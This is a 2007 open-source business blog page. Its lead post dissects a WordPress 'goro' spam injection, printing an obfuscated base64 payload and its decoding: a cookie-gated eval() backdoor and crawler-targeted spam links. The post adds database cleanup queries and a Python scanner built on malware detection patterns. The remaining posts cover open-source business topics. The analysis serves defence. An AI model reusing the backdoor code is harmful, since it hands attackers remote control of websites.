Roberto Galoppini's
Commercial Open Source Software

Where Free Software meets Business
equally critical of proprietary and open source myths,
advocating software choice beyond
marketing and romanticism

Wordpress Spam Injection: ‘Goro’ hacked my blog

Filed under: Corporate Blog, Open Source Recommendations — by Roberto Galoppini at 10:06 pm on Wednesday, December 12, 2007

Two days ago my Northern European friend Era, after reading a post, advised me that my blog had been silently owned by search engine spammers. Spam on blogs is definitely not a new phenomenon, but I knew very little about spam injection before, and I hope my experience can help other WordPress users.

The problem was that a foreign div was being loaded in the header (div id="goro"), containing a list of spam links to various porn sites. I asked my dear webbie to help me, and she put me in touch with Francesco Mosca, who actually fixed the problem as follows.

Within the theme's header.php, most likely injected through a WordPress 2.0.1 bug, two PHP lines had been added. The opening tag and the assignment to $wp_headers on the first line are inferred from the call that follows, since only the create_function() part survived in this copy:

<?php $wp_headers = create_function('', get_option("blog_headers")); ?>

[snipped code]

<?php $wp_headers() ?>

Those two lines take whatever string is stored in the blog_headers option (wp_options table, option_name = 'blog_headers'), compile it into an anonymous function with create_function(), and call it on every page that includes the header. The theme file itself holds no payload: the malicious code lives in the database, which is why re-uploading a clean theme is not enough. This is what the option contained:


611a2dee6df9249f21eb25f254b7f8f3611a2dee6df9249f21eb25f254b
7f8f3611a2dee6df9249f21eb25f254b7f8f3611a2dee6df9249f21eb25
f254b7f8f3611a2dee6df9249f21eb25f254b7f8f3*/ $c55375dba9d2f1867f4083acce95988dd=’Pz48P3BocAoJaWYoaXNzZX
QoJF9DT09LSUVbJ2F1dGgnXSkgJiYgJF9DT09LSUVbJ2F1dGgnXSA9PSAn
NjExYTJkZWU2ZGY5MjQ5ZjIxZWIyNWYyNTRiN2Y4ZjMnKSB7CgkJaWYgK
Glzc2V0KCRfQ09PS0lFWydzaG93X3Rlc3QnXSkpIHsKCQkJZWNobygiPFRF
U1RQQVNTPiIpOwoJCX0KCQkkaSA9IDA7ICRsaW4gPScnOwoJCXdoaWxlI
Chpc3NldCgkX0NPT0tJRVsnbGFzdGluJy4kaV0pKSB7CgkJCSRsaW4uPSAk
X0NPT0tJRVsnbGFzdGluJy4kaV07CgkJCSRpKys7CgkJfQoJCWlmKHN0cmx
lbigkbGluKT4wKSB7CgkJCWVjaG8oIjxsYXN0aW4+Ii5tZDUoJGxpbikuIjwvb
GFzdGluPjxleC1kYXRhPiIpOwoJCQkkbGluID0gcHJlZ19yZXBsYWNlKCcvXy
8nLCAnKycsICRsaW4pOwoJCQlldmFsKGJhc2U2NF9kZWNvZGUoJGxpbikpO
woJCQllY2hvKCI8L2V4LWRhdGE+Iik7CgkJCSRjb2RlID0gZ2V0X29wdGlvbig
nYmxvZ19oZWFkZXJzJyk7CgkJCWlmIChwcmVnX21hdGNoKCcvOTU5ODh
kZD1cJyguKj8pXCcvcycsICRjb2RlLCAkcmVncykpIHsKCQkJCWVjaG8oIjx2
ZXI+Ii5tZDUoJHJlZ3NbMV0pLiI8L3Zlcj4iKTsKCQkJfQoJCX0KCQlleGl0KCk7
Cgl9CgkkdGV4dCA9IGdldF9vcHRpb24oJ3JlY2VudGx5X2FkZGVkJyk7Cgkkd
WEgPSAkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ107CglpZiAoaXNzZXQ
oJHRleHQpICYmIHN0cmxlbigkdGV4dCk+MCAmJiAocHJlZ19tYXRjaCgnLyhib
3R8c3BpZGVyfHNsdXJwfGdvb2dsZXxleHBsb3JlcnxmaXJlZm94fG9wZXJhKS
9pJywgJHVhKSkpIHsKCQkJCSRycSA9ICRfU0VSVkVSWyJSRVFVRVNUX1VS
SSJdOwoJCQkJJHJzcyA9ICJyc3NfIi5tZDUoJHJxKTsKCQkJCSRzZWVkID0gd
W5zZXJpYWxpemUoYmFzZTY0X2RlY29kZShnZXRfb3B0aW9uKCRyc3MpKS
k7CgkJCQlpZiAoISRzZWVkKSB7CgkJCQkJZ2xvYmFsICR3cGRiOwoJCQkJCS
R3cGRiLT5xdWVyeSgiSU5TRVJUIElOVE8gJHdwZGItPm9wdGlvbnMgKG9wdG
lvbl9uYW1lLCBvcHRpb25fdmFsdWUsIG9wdGlvbl9kZXNjcmlwdGlvbiwgYXV0
b2xvYWQpIFZBTFVFUyAoJyRyc3MnLCAnJywgJycsICd5ZXMnKSIpOwoJCQk[...]2MTJFNjQzMzREMTAwRTRENTQ1NjUyMDkwQTBFNTI1MjU2NDg0MDA4M0Q0
MTRBNDY0MTM1NEMwRkY4M0UzRTNCMzJGMzA2Jyk7IDwvc2NyaXB0PiI7Cgl
9Cgo/Pg==';$e_ = error_reporting(0); eval(base64_decode($c55375dba9d2f1867f4083acce95988dd)); error_reporting($e_); return true;

The same string run through base64_decode (a stretch in the middle is missing from this copy of the page and is marked [...]; the rest decodes cleanly):

?><?php
    if(isset($_COOKIE['auth']) && $_COOKIE['auth'] == '611a2dee6df9249f21eb25f254b7f8f3') {
        if (isset($_COOKIE['show_test'])) {
            echo("<TESTPASS>");
        }
        $i = 0; $lin ='';
        while (isset($_COOKIE['lastin'.$i])) {
            $lin.= $_COOKIE['lastin'.$i];
            $i++;
        }
        if(strlen($lin)>0) {
            echo("<lastin>".md5($lin)."</lastin><ex-data>");
            $lin = preg_replace('/_/', '+', $lin);
            eval(base64_decode($lin));
            echo("</ex-data>");
            $code = get_option('blog_headers');
            if (preg_match('/95988dd=\'(.*?)\'/s', $code, $regs)) {
                echo("<ver>".md5($regs[1])."</ver>");
            }
        }
        exit();
    }
    $text = get_option('recently_added');
    $ua = $_SERVER['HTTP_USER_AGENT'];
    if (isset($text) && strlen($text)>0 && (preg_match('/(bot|spider|slurp|google|explorer|firefox|opera)/i', $ua))) {
        $rq = $_SERVER["REQUEST_URI"];
        $rss = "rss_".md5($rq);
        $seed = unserialize(base64_decode(get_option($rss)));
        if (!$seed) {
            global $wpdb;
            $wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, option_description, autoload) VALUES ('$rss', '', '', 'yes')");
        [...]
        12E64334D100E4D545652090A0E5252564840083D414A4641354C0FF83E3E3B32F306'); </script>";
    }

?>

Decoding the string with base64_decode shows a two-part payload. The first part is a backdoor: when the request carries a cookie named auth equal to the hard-coded hash, the code concatenates the cookies lastin0, lastin1, ..., turns '_' back into '+', base64-decodes the result, passes it to eval() and exits. Whoever holds that token can run arbitrary PHP on the server without touching a single file. The second part is the spam: if a non-empty option named recently_added exists and the User-Agent matches bot|spider|slurp|google|explorer|firefox|opera, the code emits a <script> tag that loads the spam links from an external site on the fly, and it caches per-URL state in wp_options rows named rss_<md5(REQUEST_URI)>, like the following:


mysql> select option_value from wp_options where option_name = 'rss_fffbb7d85fc00f0c0d14abf4fde94ce3';
+----------------------------------------------------------------------+
| option_value                                                         |
+----------------------------------------------------------------------+
| YToyOntpOjA7czo0OiIxMTg3IjtpOjE7czoxODoiL3d3dy5tYW5kcml2YS5jb20vIjt9 |
+----------------------------------------------------------------------+

The value is a base64-encoded PHP serialized array; decoded it reads a:2:{i:0;s:4:"1187";i:1;s:18:"/www.mandriva.com/";}, that is, a two-element array holding the strings "1187" and "/www.mandriva.com/".

Besides erasing the above mentioned lines from header.php, you also need to erase blog_headers and its 'friends' from the database. The payload also reads an option named recently_added, which switches the spam output on, so look at that row as well. In a LIKE pattern the underscore is a single-character wildcard, so run the second statement as a SELECT first and review what it matches before deleting:

delete from wp_options where option_name = 'blog_headers';
delete from wp_options where option_name like 'rss_%' and option_name not in ('rss_language', 'rss_use_excerpt', 'rss_excerpt_length');
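To find all the offending rows before deleting anything, here is an added example, written for this page and not part of the original post or of Francesco Mosca's fix: a Python scanner that takes (option_name, option_value) pairs, as you would get from SELECT option_name, option_value FROM wp_options, and flags the three things the goro injection leaves behind: PHP constructs inside an option value, base64 strings that decode to PHP (including a cookie-gated eval()), and rss_* rows outside the three legitimate ones. The rows it scans are constructed here; the fake payload, the hostname and the token 'constructed-token' are stand-ins, while the rss_ value is the one quoted above.

```python
"""Scan wp_options rows for the goro-style pattern: PHP hidden in option
values, base64-wrapped payloads, cookie-gated eval() backdoors and the
rss_<md5> cache rows the payload creates. Sample rows are constructed here."""
import base64
import binascii
import re

# The only rss_* options a stock WordPress of that era owns; anything else
# named rss_* is treated as payload cache (same allow-list as the cleanup query).
LEGIT_RSS_OPTIONS = {"rss_language", "rss_use_excerpt", "rss_excerpt_length"}

# PHP constructs and markers that never belong in a wp_options value.
SUSPICIOUS_PHP = re.compile(
    r"\b(?:eval|create_function|base64_decode|assert|gzinflate|str_rot13)\s*\("
    r"|\$_COOKIE|\$_REQUEST|<\?php|<script",
    re.IGNORECASE,
)
# Runs of base64 alphabet long enough to hide code. Whitespace is stripped
# first because SQL dumps (and blog posts) wrap long values; random text that
# happens to match still has to decode to valid UTF-8 to be reported.
BASE64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
PHP_SERIALIZED = re.compile(r"^[aOs]:\d+[:{]")


def _is_text(data: bytes):
    """Return the decoded string if `data` is printable UTF-8 text, else None."""
    try:
        text = data.decode("utf-8")
    except UnicodeDecodeError:
        return None
    return text if all(ch.isprintable() or ch in "\r\n\t" for ch in text) else None


def decode_base64_runs(value: str, depth: int = 3):
    """Yield every base64 run in `value` that decodes to text, recursing into
    the decoded text so that nested wrapping (a decoder inside a decoder) is
    unwrapped too."""
    if depth == 0:
        return
    compact = re.sub(r"\s+", "", value)
    for run in BASE64_RUN.findall(compact):
        try:
            raw = base64.b64decode(run, validate=True)
        except (binascii.Error, ValueError):
            continue
        text = _is_text(raw)
        if text is None:
            continue
        yield text
        yield from decode_base64_runs(text, depth - 1)


def scan_option(name: str, value: str):
    """Return the list of findings for one (option_name, option_value) row."""
    findings = []
    if name.startswith("rss_") and name not in LEGIT_RSS_OPTIONS:
        findings.append("name matches the rss_<md5(REQUEST_URI)> cache pattern")
    hits = sorted({m.group(0) for m in SUSPICIOUS_PHP.finditer(value)})
    if hits:
        findings.append("PHP in option value: " + ", ".join(hits))
    for text in decode_base64_runs(value):
        inner = sorted({m.group(0) for m in SUSPICIOUS_PHP.finditer(text)})
        if inner:
            findings.append("base64-wrapped PHP: " + ", ".join(inner))
        if "$_COOKIE" in text and re.search(r"\beval\s*\(", text):
            findings.append("cookie-gated eval(): remote code execution backdoor")
        if PHP_SERIALIZED.match(text):
            findings.append("base64-wrapped PHP serialized data: " + text[:60])
    return findings


def scan_options(rows):
    """Map option_name -> findings for every row that has any."""
    report = {}
    for name, value in rows:
        findings = scan_option(name, value)
        if findings:
            report[name] = findings
    return report


# Constructed stand-in for the decoded goro payload (not the real one): a
# cookie-gated eval() followed by the spam <script> tag served to crawlers.
_FAKE_PAYLOAD = (
    "?><?php\n"
    "if (isset($_COOKIE['auth']) && $_COOKIE['auth'] == 'constructed-token') {\n"
    "    eval(base64_decode($_COOKIE['lastin0']));\n"
    "    exit();\n"
    "}\n"
    "echo \"<script src='http://spam.example.invalid/links.js'></script>\";\n"
    "?>"
)
# Same wrapper shape as the real blog_headers value: base64 blob plus a one-line eval.
_WRAPPED = (
    "/*constructed*/ $c1='" + base64.b64encode(_FAKE_PAYLOAD.encode()).decode()
    + "'; $e_ = error_reporting(0); eval(base64_decode($c1)); error_reporting($e_); return true;"
)

# Constructed wp_options rows: three benign, two malicious. The rss_ row value
# is the one quoted in the post (a base64 PHP serialized array).
SAMPLE_ROWS = [
    ("siteurl", "http://blog.example.invalid"),
    ("rss_language", "en"),
    ("blogdescription", "Where Free Software meets Business"),
    ("blog_headers", _WRAPPED),
    ("rss_fffbb7d85fc00f0c0d14abf4fde94ce3",
     "YToyOntpOjA7czo0OiIxMTg3IjtpOjE7czoxODoiL3d3dy5tYW5kcml2YS5jb20vIjt9"),
]

if __name__ == "__main__":
    for name, findings in scan_options(SAMPLE_ROWS).items():
        print(name)
        for finding in findings:
            print("   -", finding)
```

Run it against a real export by replacing SAMPLE_ROWS with the fetched rows; every flagged name is a candidate for the DELETE statements above, and a cookie-gated eval() finding means the site was remotely controllable, so the entry point and the credentials it could have harvested need attention too, not just the rows.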

Find and remove the goro spamware injection before Google bans you from the web. Since the way in was only guessed at, also upgrade WordPress and change the passwords the site relies on (administrator accounts, database, FTP), otherwise the payload can simply be planted again. Amazingly, as soon as I got it fixed my blog got its previous position back.

Note: my blog is under repair these days; the old theme will soon be available, along with Twitter and Skype alerts. Sorry about that.


Open Source ECM: Alfresco opens up to social networks

Filed under: Commercial OSS, Corporate Blog, Open Source Recommendations, Social Networks — by Roberto Galoppini at 9:31 pm on Monday, December 10, 2007

After announcing its integration with Facebook, Alfresco has made public that the Alfresco Social Computing Platform, which integrates Alfresco with Adobe Flex, Facebook, iGoogle, MediaWiki, TypePad and WordPress, will be available for download on SourceForge by tomorrow.

While Alfresco is probably not the first open source project to experiment with Facebook, John Newton, co-founder and Chief Technical Officer of Alfresco, believes that pushing for the expansion of social computing in the enterprise is an imperative. John, in his “manifesto for Social Computing in the Enterprise”, states:

The next generation of enterprise employees who started using the internet in their early teens have only known this evolving culture of free and creative development of the internet and now demand better of the enterprise software that they meet.

While I don’t know whether every CTO should be on Facebook, as Jon Williams says at the New York CTO blog, I believe Seth Gottlieb’s theory is correct:

most Intranets fail as social collaboration tools because they cannot capture the energy and passion that seems to form spontaneously on the web. And my theory goes on to assert that people do not invest their personal energy on their corporate intranet because they don’t own it.

John, why are you addressing the Facebook audience?

In order for ECM to move from 10% that are specialists in a firm (compliance, doc control, regulatory, maintenance and web sites) to the 90% that need it to control out-of-control information on shared drives, it would need to introduce compelling user interfaces based upon social networking and social computing.

I think Alfresco made a great move: addressing the needs of the new generation of knowledge workers is enabling a new enterprise vision of social computing.

Last but not least, Alfresco, rather than building everything on its own, is defining an architecture of participation based on its Web Scripts Framework. Let’s see if it eventually helps them foster their community.


Commercial Open Source Blog: one year in review

Filed under: Commercial OSS, Corporate Blog, Random thoughts — by Roberto Galoppini at 1:38 pm on Friday, November 9, 2007

Today I took my time to look back over my last year of blogging about open source. The Commercial Open Source blog has just completed its first year of life.

In November 2006 I scrambled, with the generous help of Antonella Beccaria and a little advice from my new media mentor Robin Good, to create the blog site you are reading right now.

A year in review, by _mpd_

I was happy. I was excited. I could not hold myself in place. I felt that the time to share my ideas, some of my experiences, a bit of my know-how had definitely come.

I see the web as a venue for sharing, exchanging and making valuable conversations, and I thought that I had to make myself fully part of this.

One idea that significantly influenced my decision to take on blogging was the Open Source Franchising business model. As a matter of fact, in the summer of 2006 I had already written a paper describing that business model, which I had also submitted to Sun Microsystems. My desire, especially since Sun never commented back on my proposal, was to extend my quest for feedback and opinions to other authoritative open source thought leaders.

Matt Asay commented positively on my idea, and many others followed, opening the conversation. It was my very first success as a blogger, and it showed me the importance and effectiveness of using a blog to create an online dialogue. The conversation went on for several months, until Simon Phipps, Chief Open Source Officer at Sun, fully embraced my idea to the point of taking up the flag himself.

Thanks to this and probably to some of my other writings, some initial gigs came through:

And that’s how I discovered how blogging could help me get invited to meetings, events and conferences, eventually opening doors and new opportunities. As I go forward in my blogging experience I am realizing that using writing to get greater exposure and visibility may very well be my best marketing strategy.

Like it or not, I also had my share of ego-boosting. Initially mostly as a psychological reward, later on as an increasingly valuable measure of my own professional credibility, I have spent my share of time checking Technorati and looking at Google ranks, just like everyone else. And I learned a few things:

  1. you can get to know lots of like-minded people who share your interests, passions and sometimes business customers, and reach out to them in ways that would be next to impossible in the physical world;

  2. among my key referrers, opensource.org and openoffice.it/org have played a significant role in sending me a huge number of visitors, which made me realize how important it is to keep contributing whenever possible to such large and important communities;

  3. Robin Good was totally right in suggesting I pay great attention to choosing the tag-line. Googling for Commercial Open Source, my blog is always one of the very first results. Because of that, PR agencies and CEOs from all around the world touch base with me daily to open more and more conversations;

  4. I learned to stay focused and not get distracted by off-topic arguments; as soon as I did, I was rightly reprimanded for that.

Last but not least, I wish to share some authors and bloggers I found inspirational:

I learned a lot from them, and with some I am enjoying regular conversations. After all, the ultimate reason for all of us to keep writing daily is that it is really true that no man is an island, not even a blogger!


Open Source Government: Development and Strengthening of Local and Central Public Administrations

Filed under: Commercial OSS, Corporate Blog, Italians do it, My Meetings, Open Source Recommendations — by Roberto Galoppini at 10:45 am on Saturday, October 20, 2007

I just got back from Sarajevo, where I participated as a speaker in an advanced course on web communications in the Public Administration. The course, aimed at public operators from Bosnia-Herzegovina, was designed as an in-depth analysis of the use of Open Source in Public Administrations.

Sarajevo, by Giuli@

I had the honor of presenting two seminar sessions, talking about Open Standards and Open Source Software. I opened my first speech by focusing on what a software patent is, and how patents (could) affect open data standards. I spent an hour or so talking about Open Source Requirements, Principles and Practices and making analogies with the real world (power plugs, etc.).

My second pitch was all about pragmatic open source. I started by speaking about how Organisational Wiki Adoption could greatly help communications and information flows within Public Administrations. The audience was pretty interested and we eventually ended up comparing email, Instant Messaging and Groove against a wiki, in terms of usability, synchronicity of interaction and ease of participation.

Attendees were concerned about the perception of Open Source and about open source support, and I showed them some useful tools for managing software selections. Since only a few open source projects offer enterprise support, I made them familiar with:

I really enjoyed being there. The audience, despite the latency due to translation, was participative and eager to know more and more.

It is a country of contrasts, where people died together and now try to live together. A very interesting country, and I really hope to get a chance to go back.

About the Communications for the Public Administration course.

The project “Balkans 2 - Development and Strengthening of Central and Local PA in the Balkan Region” is aimed at 6 Balkan countries (Albania, Bosnia-Herzegovina, Croatia, Macedonia, Serbia and Montenegro) and continues the activities already started and partly developed with the Balkans 1 project, which ran from November 3rd to December 31st 2004. This is an integrated project of “Institutional and Capacity Building” aimed at civil servants and executives from central and local Balkan administrations, divided into diverse activities of technical assistance, classroom and on-the-job training, information and communications on themes identified and agreed upon together with the institutional counterparts of the involved countries during the numerous missions and meetings held in the first year of activities. The dedicated areas are the following: Civil Protection; Management of Protected Areas; Cultural Heritage; Communications for the Public Administration.


Open Source Links: 18-07-2007

Filed under: Commercial OSS, Corporate Blog, File Format — by Roberto Galoppini at 10:16 pm on Wednesday, July 18, 2007

Disappointed: Nick Gall of Gartner - James McGovern wonders why at Gartner they don’t spend time answering his questions. My guess is that they are not (yet) deeply into the ‘blog thing’, because if they had a look at their popularity, James’s blog pops up as one of the most authoritative pointing to them.

Office 2.0 Conference Website Now Live - The Office 2.0 Conference website is now live, and attendee registration is open.

blogging is dead, long live communicating - Luis Villa says that most discussions about blogging would be much better off if we analyzed ‘communication that is public, searchable and persistent’ instead of ‘blogging’. I totally agree.

We need an Open Service Definition - People at GNOME (Havoc Pennington’s blog) are thinking about how to protect our private data, but the same definition could also reward services which use and promote open knowledge. Interesting issue.

Will Oracle Buy Red Hat or BEA? - Savio plays Nostradamus and predicts that Oracle will not buy Red Hat. Oracle may buy BEA. Read his post to find out why.

Managing backup of MySQL via iPhone - Whether it makes sense or not, Zmanda presented to a couple of their customers a solution to manage MySQL backups via iPhone; read the use case.

Can’t buy me (OOXML) love in Italy - Bob Sutor enjoyed Carlo Piana’s post “OOXML does not buy its way in Italy“, and he also posed a question: whether a large company with a lot of money and business partners will essentially be able to stack committees so that they are out of balance, and therefore buy an ISO standard. I am afraid that the whole ISO standardization process has lost some of its meaning; the ultimate result of the File Format War might be to invalidate the process owner itself.

Talend raises $3.5m in Series B funding round - Raven Zachary tells us about Talend’s second round.

Funambol is a 2007 AO 100 Top Company - Fabrizio got listed in the AO 100 Top Companies, congratulations!

Gartner, Open Source, and Microsoft - Seth keeps posting on the subject, he simply can’t resist! ;-)

Barcamp: Vlogcamp, a barcamp on Video-blogging

Filed under: Corporate Blog — by Roberto Galoppini at 12:19 pm on Tuesday, June 26, 2007

The first Italian Barcamp about video-blogging and Web TV went live over the Internet in many different forms last Saturday, from the Taxi Channel studios here in Rome.

Vlog camp, Robin Good & Tommaso Tessarolo, by Smeerch

Despite the hot day, there were quite a few people, and I happened to meet Bruno Pellegrini, founder of Nessuno.TV, a portal for Italian videobloggers, and also of TheBlogTV, probably the first TV station broadcasting user-generated content. Bruno also wrote a book, entitled “Io? Come diventare videoblogger e non morire da spettatore” (English: “Me? How to become a videoblogger and not die a spectator”), given as a present to all participants.

Tommaso Tessarolo, author of another book entitled “NetTv“, was also present, and he showed an interesting backstage video.

Robin Good went live the whole time on his robingood.tv; I happened to help him record his speech about how to become a video-blogger, and I interviewed Amanda Lorenzani and Leo Sorge about Italian startups.
Robin Good reported the whole event in two different posts, Part 1 and Part 2; if you speak Italian, or want to, have a look!


Open Source Links: 19-05-2007

Filed under: Commercial OSS, Corporate Blog, Italians do it, Software Patent — by Roberto Galoppini at 6:44 pm on Saturday, May 19, 2007

Business as Usual - Bill Hilf on Port25: It’s not us versus the free world.

Three Minutes with Microsoft’s Open-Source Manager - Bill Hilf explains Microsoft’s strategy: to license and not litigate. Am I the only one thinking of the Cold War at this stage?

235 more reasons to love open source - Fabrizio Capobianco designed a funny and provocative t-shirt, and I guess he is going to bring along an XXL one for Bill Hilf next Monday!

Steve? Darl? All of the Above? - Billy Marshall asserts that Microsoft won’t like the nature of the collateral damage caused by the 235 move.

(added on the 20th) Microsoft’s Patent Impasse - A lucid commentary by Coté, really enlightening.

Organizing an Open Source Workshop!!! - A workshop entitled “Open Source, Open Ideas” will be held on Tuesday May 29th at the Politecnico di Bari campus, sponsored jointly by Politecnico di Bari, OrgLab (University of Cassino), Syracuse University and IESEG School of Management.

Dell announces the models for Ubuntu - Jeremy discloses Dell’s Ubuntu models.

I’m Joining Adobe - Ryan Stewart joined Adobe as a Rich Internet Application Evangelist.

Community development: O’Reilly joins MySQL Board

Filed under: Commercial OSS, Corporate Blog — by Roberto Galoppini at 8:14 pm on Friday, March 9, 2007

MySQL is really working hard to foster its community, and the MySQL Winter of Code initiative sounds like just the first notable step. Today Tim O’Reilly explained why he just joined the MySQL Board.

O’Reilly, by Duncan Davidson

Second, Mårten, Monty, and David asked me nicely :-), and after some substantial discussions with them, I came to the conclusion that I could add some value to the company. They were looking for someone who had a sense of the competing pressures of business and open source idealism, and could help them steer a careful course through the obstacles. As open source grows up, there can be tension between its community roots and its business aspirations. But that tension can also be a creative force, and MySQL AB wants to be sure to continue to harness the creativity of the open source developer community, as it becomes an ever-more viable alternative to existing closed source commercial databases.

Well done MySQL, well done... and they are already getting the very first result:

While I’m on the subject of MySQL, I should mention that O’Reilly produces the MySQL User Conference in conjunction with MySQL AB. The conference will be held April 23-26 in Santa Clara. The early registration discount ends March 14, so if you’re interested in MySQL, you should sign up now.

Whatever you call it, Word of Mouth, Liquid, or Viral Marketing, it works, and any commercial open source firm needs it indeed.


Blog: Robin Good’s way to be your own boss

Filed under: Corporate Blog — by Roberto Galoppini at 12:33 pm on Friday, March 2, 2007

Robin Good, a famous independent online publisher, gave a very interesting speech at Ancona’s barcamp titled “Be your own boss”, explaining how to make money blogging.

Robin Good’s presentation, photography courtesy of 7th Floor - MAP

He also wrote a good piece based on his presentation. A must read if you want to know how to make your blog more effective, whether or not you’re interested in making money from it. Fourteen of the sixteen points are not about monetizing at all, and many of them point to other resources.

  • Find your passion
  • Create your shack
  • Niche, Theme, Focus
  • Write daily
  • Become a Newsmaster
  • Quality not Quantity
  • Make Yourself Be Found
  • Make Yourself Be Read
  • Communicate Visually
  • If you want them to return, send them away
  • Open the conversation
  • Create your own “brand”
  • Promote your contents
  • Monetize
  • Google AdSense
  • Track, Monitor, Test

Take your time, and read them all!


Corporate blog: IDC Conference on Content&Document Management

Filed under: Corporate Blog — by Roberto Galoppini at 5:09 pm on Monday, February 5, 2007

Although I am no Robert Scoble, I’m honored to have been invited by FIDAInform, the National Federation of the Associations of Information Management Professionals, to give a speech about Corporate Blogging at the IDC Content & Document Management Conference 2007, held last Tuesday here in Rome.

Being a neo-blogger, I took the chance to share with the audience, mostly Public Administration managers, a little bit of my own experience and insights into what I have learned in the last few months.

I started talking about the five key things that have influenced corporate blogging:

  1. The blogosphere dimension
    doubling every 236 days, 100 times bigger than 3 years ago;

  2. Mainstream media vs blogs
    only 3 blogs in the first 50 positions, but the “long tail” belongs to blogs;

  3. People talk
    the value created by a group-forming network grows exponentially with its members;

  4. Push vs Pull
    web feed formats changed the way we keep ourselves informed;

  5. Blogging
    is simple.

Then I gave a few examples showcasing the above issues at work.

External blogs.
I mentioned how blogs can be Marketing’s nightmare and dream, or tools to leverage market conversations. Networked markets often know more than companies do about their own products. Blogs might also help to build connections with key audiences. Through transparency, an external corporate blog might add a level of credibility unobtainable from standard media, like showing a different side of the company.

Internal Blogs.
By opening the decision-making process to the whole organisation, blogs can avoid the hierarchical vertical confirmation process, exploiting lateral thinking and the potential of collective intelligence. The blog also becomes the written memory of the organization, replacing emails, which are not the best information sharing tool.

Feeds.
Posts and comments are easy to reach and follow without the need to visit the blog, whether it is an internal or an external one. Within an organization, RSS, being spam-free, can easily surface any sort of information through basic search applications, making financial or technical news readily at hand. Last but not least, the cost of producing RSS content is mostly negligible. To see how a feed-reader works I suggest trying on-line tools: Andrea Martines developed Excite-MIX, a really easy to use widgeted page.

My Experience.
I started blogging just three months ago, and I keep talking daily about Corporate Blogging with Robin Good and Nicola Mattina. I have also signed up for some “persistent news searches” using “corporate blog” as my search keyword.

I also work very hard to make mistakes, so that I can always learn something new.
